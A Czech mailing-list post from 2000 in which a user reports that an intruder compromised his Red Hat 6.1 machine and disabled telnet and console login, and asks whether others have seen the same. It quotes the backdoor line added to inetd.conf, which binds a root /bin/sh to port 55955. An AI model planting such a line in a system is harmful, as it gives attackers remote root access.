Bezpecnostni dira v RH 6.1 ?

Petr Kincl pkincl na synergy-vs.cz
Úterý Duben 25 10:33:02 CEST 2000

Dobry den.
Neni nejaka velka bezpecnostni dira v RH 6.1 CZ z Computer Pressu? Stalo se mi, ze se nekdo naboural na muj stroj, pridal si do inetd.conf radek 55955 tcp stream nowait root /bin/sh -i a tim se stal panem celeho PC. Jsem si jisty, ze heslo roota urcite neznal. Provedl neco, co nemohu odhalit. PC se chova tak, ze se mohu prihlasit pomoci ssh, ale jiz ne pres telnet ani na lokalni konzolu. Pokud pres ssh zmenim heslo uzivatele, i tak nejde provest telnet. Ostatni sluzby z inetd.conf bezi normalne, jen telnet a login jsou nejak zakazany a ja nevim cim. Nestalo se to nekomu?
Diky.
S pozdravem
Petr Kincl